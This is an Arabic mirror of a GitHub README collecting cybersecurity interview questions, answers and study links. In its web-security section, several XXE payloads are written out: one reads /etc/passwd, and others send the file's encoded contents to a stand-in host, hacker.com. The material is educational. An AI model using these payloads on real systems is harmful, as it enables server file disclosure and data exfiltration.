Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Interview_Tips — ملخص لأسئلة مقابلات الأمن السيبراني التي مررت بها، آمل أن يساعدك هذا | Kitploit
أدوات/GitHubGitHub/jigerjain/interview_tips
أمن الويبأمن الشبكاتالتشفيرأمن السحابةالتعلم والتعليمموارد منسقةمسارات ودورات التعلماستغلال الملفات الثنائية
GitHubjigerjain/interview_tips

Interview_Tips

ملخص لأسئلة مقابلات الأمن السيبراني التي مررت بها، آمل أن يساعدك هذا

عرض المستودع
69176منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نصائح المقابلات (أمن المعلومات)

هذه الصفحة هي ملخص للمقابلات التي مررت بها، وقد غطّت نطاقًا جيدًا من الأدوار، وتلقيت رفضات متعددة، لكنني تعلمت من كل مقابلة، وجمعت ملاحظات بنّاءة ومضيت قدمًا. آمل أن تساعدك هذه الأسئلة/النصائح.

الأدوار التي يغطيها بشكل عام هي كما يلي:

  • متدرب في الأمن السيبراني
  • متدرب في اختبار الاختراق / الفريق الأحمر
  • متدرب في أمن تطبيقات الويب / أمن التطبيقات
  • متدرب في أمن المنتجات
  • متدرب في أمن البنية التحتية

نصيحة سريعة:

  • راجع سيرتك الذاتية واسأل نفسك أسئلة متعلقة بها مسبقًا
  • إذا لم تكن على دراية بأي سؤال/مفهوم، لا تتهرب من الموضوع، ووضّح أنك تستطيع تعلمه إذا توفرت لك بيئة للعمل
    لا يمكنك معرفة كل شيء، كن متواضعًا لتقبل إن أخطأت في إجابة أو كنت بحاجة إلى توضيح
  • جهّز نبذة قصيرة عن نفسك مسبقًا لتقدم بها نفسك
  • كن واثقًا من هدفك النهائي ولماذا أمن المعلومات؟
  • أخيرًا، اسأل عن التغذية الراجعة في نهاية المقابلة، لماذا؟ لأنها: تساعد في معرفة وسد الفجوات في معرفتك الحالية بأمن المعلومات

لقد حاولت تدوين جميع الأسئلة المحتملة أدناه التي صادفتها وقدمت إجابات للبعض. أما الباقي فيمكنك البحث عنه في جوجل للحصول على إجابات محددة إذا أردت التعمق. بالإضافة إلى ذلك، هناك بعض المراجع في النهاية، ألقِ نظرة عليها. لقد كانت مفيدة حقًا.

سأحب إضافة المزيد من الأسئلة كلما تقدمت وراجعت ملاحظاتي، ومع ذلك سأقدّر لو قدمت لي ملاحظات بنّاءة حول هذا الموضوع بالتواصل معي عبر [email protected]. إذا صادفت شيئًا غير مغطى هنا، فلا تتردد في مشاركته.

أسئلة شائعة

  1. ثلاثيات الأمان:

ما هي CIA؟

  • السرية
  • النزاهة
  • التوافر

ما هي AAA؟

  • المصادقة
  • التفويض
  • المحاسبة
  1. الفرق بين التهديد والثغرة والاستغلال والمخاطر وكيف ترتبط بالأصول
  • التهديد (Threat):
    التهديد هو ما نحاول الحماية منه
  • الثغرة (Vulnerability):
    الثغرة هي ضعف أو فجوة في جهود الحماية لدينا
  • الاستغلال (Exploit):
    قدرة/برنامج (قد يكون برنامجًا أو مهارة هندسة اجتماعية) تم تطويره لمهاجمة أصل من خلال استغلال ثغرة
  • الخطر (Risk):
    الخطر هو نقطة التقاطع بين الأصول والتهديدات والثغرات
  • الأصل (Asset):
    الأصل هو ما نحاول حمايته
  1. ما هو IAM ولماذا يُستخدم؟
    IAM هو إدارة الهوية والوصول (Identity Access Management) والتي تُستخدم لفصل الأدوار والمسؤوليات داخل المؤسسة. إنها جزء حاسم من الأمن. تساعد في الحفاظ على أمن مستوى الوصول والامتيازات

الأمن بشكل عام

مراحل هجوم اختراق الشبكة:

  • الاستطلاع / جمع المعلومات
  • الحصول على الوصول المطلوب
  • الحفاظ على الوصول
  • إخفاء الآثار (حذف السجلات، البوابات الخلفية، وإخفاء جميع أدوات التحكم)

أمن تطبيقات الويب

  1. سؤال شائع:
  • OWASP Top 10

  • ما هو XSS (البرمجة النصية عبر المواقع)؟

    • تدرب على XSS على: [https://xss-game.appspot.com/]
    • كيفية مكافحة XSS: باختصار استخدم التحقق المناسب من المدخلات
    • ابحث عن ترويسة CSP (سياسة أمان المحتوى)
    • أنواع XSS المختلفة: المنعكسة (Reflected)، المخزنة (Stored)، والقائمة على DOM
    • ما هي المصادر والمصارف في DOM التي قد تؤدي إلى XSS:
      [https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
  • ما هو CSRF هذا هو السؤال الأجمل الذي يحب كل محاور أن يسأله
    نصيحة سريعة: كن موجزًا، وإذا طُلب منك فقط اشرح القصة كاملة

    تزوير الطلب عبر المواقع (CSRF) هو هجوم يجبر المستخدم النهائي على تنفيذ إجراءات غير مرغوب فيها في تطبيق ويب يكون مصادقًا عليه حاليًا. تستهدف هجمات CSRF تحديدًا الطلبات المغيِّرة للحالة، وليس سرقة البيانات، لأن المهاجم لا يمكنه رؤية الاستجابة للطلب المزور. بمساعدة بسيطة من الهندسة الاجتماعية (مثل إرسال رابط عبر البريد الإلكتروني أو الدردشة)، قد يخدع المهاجم مستخدمي تطبيق الويب لتنفيذ إجراءات يختارها المهاجم. إذا كانت الضحية مستخدمًا عاديًا، يمكن لهجوم CSRF ناجح أن يجبر المستخدم على تنفيذ طلبات تغيير الحالة مثل تحويل الأموال، تغيير عنوان بريده الإلكتروني، وما إلى ذلك. إذا كانت الضحية حسابًا إداريًا، يمكن أن يعرض CSRF تطبيق الويب بالكامل للخطر.

  • كيفية مكافحة CSRF:
    استخدام رموز مكافحة CSRF
    استخدام سياسة نفس الأصل
    استخدام ترويسة Referrer

  • ما هو ترميز HTML/URL

  • هل بروتوكول HTTP عديم الحالة؟
    HTTP بروتوكول عديم الحالة بطبيعته لكن الخادم يستخدم ملفات تعريف الارتباط لجعله ذو حالة

  • ما هي أنواع الحقن: SQL، الأوامر، نظام التشغيل

  • كيفية مكافحة حقن SQL
    استخدام الاستعلامات المعلمة والإجراءات المخزنة

  1. افحص الترويسات التي تساعد في توفير الأمان (اطّلع على الروابط وتصفح المحتوى، سيساعدك في بناء أساسياتك):
  • CSP (سياسة أمان المحتوى) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
    [https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
  • CORS (مشاركة الموارد عبر الأصول) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
  • سياسة نفس الأصل [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]
  1. هناك سيناريوهات نادرة قد يطرح فيها المحاور هذه الأسئلة، صادفتها في مراحل متأخرة من بعض المقابلات، ففكرت في ذكرها:
  • ما هو XXE (الكيانات الخارجية في XML)؟
    حقن الكيانات الخارجية في XML (المعروف أيضًا باسم XXE) هو ثغرة أمنية في الويب تسمح للمهاجم بالتدخل في معالجة التطبيق لبيانات XML. غالبًا ما تتيح للمهاجم عرض الملفات على نظام ملفات خادم التطبيق، والتفاعل مع أي أنظمة خلفية أو خارجية يمكن للتطبيق نفسه الوصول إليها.
    تحقق من هذا [https://portswigger.net/web-security/xxe]
    مثال:
    root@kitploit:~
    <?xml version="1.0" encoding="UTF-8"?>    
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>     
    <stockCheck><productId>&xxe;</productId></stockCheck> 
    
    في بعض الحالات، يمكن للمهاجم تصعيد هجوم XXE لاختراق الخادم الأساسي أو بنية تحتية خلفية أخرى، من خلال استغلال ثغرة XXE لتنفيذ هجمات تزوير الطلبات من جانب الخادم (SSRF).
  • خارج النطاق (Out-Of-Band) - باستخدام كيانات XML، يمكن التقاط البيانات من الخادم وإرسالها إلى hacker.com (لا يتطلب مخرجات من الخادم)

ليتم حقنه: document.xml

root@kitploit:~
<!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
    %remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity

مضيف خارجي: http://hacker.com/evil.dtd

root@kitploit:~
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
                    --- OR ---
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'file://%payl;'>"> - consider error-based

المرجع: [https://phonexicum.github.io/infosec/xxe.html]

  • ما هو هجوم SSRF (تزوير الطلبات من جانب الخادم)
    يمكن استخدامها للتسلل إلى الشبكة الداخلية
  • كيفية تأمين بنية الويب ثلاثية الطبقات
  • ما هو Kerberos https://www.varonis.com/blog/kerberos-authentication-explained/
  • ما هي إدارة الأسرار والخزائن https://www.hashicorp.com/resources/introduction-vault-whiteboard-armon-dadgar

أمن الشبكات

  • الفرق بين التشفير المتماثل وغير المتماثل
  • الفرق بين تشفير المفتاح العام وتشفير المفتاح غير المتماثل: كلاهما نفس الشيء سؤال خادع
  • أنماط التشفير (مثل EBC، CBC، إلخ)
  • ما هي سرية التقديم المثالية (Perfect Forward Secrecy)؟
    [https://scotthelme.co.uk/perfect-forward-secrecy/] ببساطة، المهمة الأساسية لـ PFS هي التأكد من أنه في حالة اختراق المفتاح الخاص للخادم، لن يتمكن المهاجم من فك تشفير أي اتصالات TLS سابقة. سرية التقديم المثالية ممكنة باستخدام تبادل مفاتيح Diffie-Hellman المؤقت، الذي يوفر مفاتيح جديدة لكل جلسة وتظل صالحة ما دامت الجلسة نشطة.
  • نظرة على مجموعة الشفرات (Cipher suite):
    مثال: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
    https://scotthelme.co.uk/https-cheat-sheet/
  • أثناء ضغط البيانات وتشفيرها، ما الذي يحدث أولاً الضغط أم التشفير؟
    الضغط يحدث أولاً، لأن الإنتروبيا (انتشار العشوائية) في البيانات منخفضة، وبالتالي يمكن تحقيق ضغط أعلى، لذا من المفيد الضغط أولاً ثم التشفير.
  • الفرق بين التشفير والترميز والتجزئة والإخفاء
    https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/
  • ما هو جدول قوس قزح: باختصار هو مجموعة من التجزئات المحسوبة مسبقًا
  • كيف يعمل TLS؟
    هذه صورة رائعة صادفتها، ساعدتني في فهم TLS بلغة بسيطة
    http://i.imgur.com/5T2fJsG.png
  • ما هو توقيع الشهادات
  • كيف يعمل Traceroute
  • كيف يعمل Nmap
  • ما هي جهة إصدار الشهادات (CA)
  • ما هي المنطقة منزوعة السلاح (DMZ) وما المكونات المشاركة فيها
  • على أي منفذ يعمل ping؟
    سؤال خادع بالتأكيد، لكنه مهم.
    تلميح: ICMP هو بروتوكول من الطبقة الثالثة (لا يعمل عبر منفذ). هناك صيغة جيدة لهذا السؤال وهي سؤال ما إذا كان ping يستخدم TCP أو UDP. كلا الإجابتين خاطئتان، لأن تلك بروتوكولات من الطبقة الرابعة.

أمن السحابة

سأتحدث بشكل عام عن AWS، ومع ذلك هناك مزودو سحابة آخرون مثل Azure وGCP وDigital Ocean وغيرهم..

  • المكونات العامة لـ AWS:
    S3، EC2، Buckets، IAM، Cloud trial، Cloud watch
  • ما هو IAM ومكوناته: باختصار يُستخدم IAM لإدارة الوصول حيث يستخدم الأدوار (للوصول المؤقت)، والسياسات، والمجموعات، والمستخدمين لعمله
  • ما هو EC2: هو مثيل مرن (Elastic instance) لتشغيل آلة افتراضية
  • هل يمتلك EC2 تشفيرًا: نعم. تشفير Amazon EBS يوفر حلاً بسيطًا للتشفير لوحدات تخزين EBS دون الحاجة إلى بناء وصيانة وتأمين البنية التحتية لإدارة المفاتيح الخاصة بك. يستخدم تشفير Amazon EBS مفاتيح رئيسية للعملاء (CMKs) من AWS Key Management Service (AWS KMS) عند إنشاء وحدات تخزين مشفرة وأي لقطات (snapshots) يتم إنشاؤها منها. يمكن العثور على المزيد ... أدناه https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html

استغلال الثنائيات (Binary Exploitation)

  • أدوات يمكن استخدامها لتصحيح أخطاء ملف ثنائي:
    Linux: gdb, radare, clutter (واجهة رسومية لـ radare)
    Windows: IDA, Binary Ninja
  • ما هو تجاوز سعة المخزن المؤقت (Buffer Overflow)
  • ما هي ثغرة سلسلة التنسيق (Format String Vulnerability)
  • الفرق بين منطقة Stack ومنطقة Heap (قد تفكر أيضًا في النظر إلى مناطق Code وText وBss)
  • ما هي حُرُس المكدس (Stack Cookies)
  • ما هو ASLR ولماذا يُستخدم؟
  • ما هي الذاكرة غير القابلة للتنفيذ؟

المراجع

الموارد التعليمية:
https://regexone.com/ (التعبيرات النمطية ضرورية!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
أسئلة مقابلات أمن المعلومات:
https://danielmiessler.com/study/infosec_interview_questions
أهم أسئلة اختبار الاختراق:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
نصائح Python:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
دليل مستخدم AWS:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
نظرة إلى SMB وSamba: https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/

تنزيل الأداة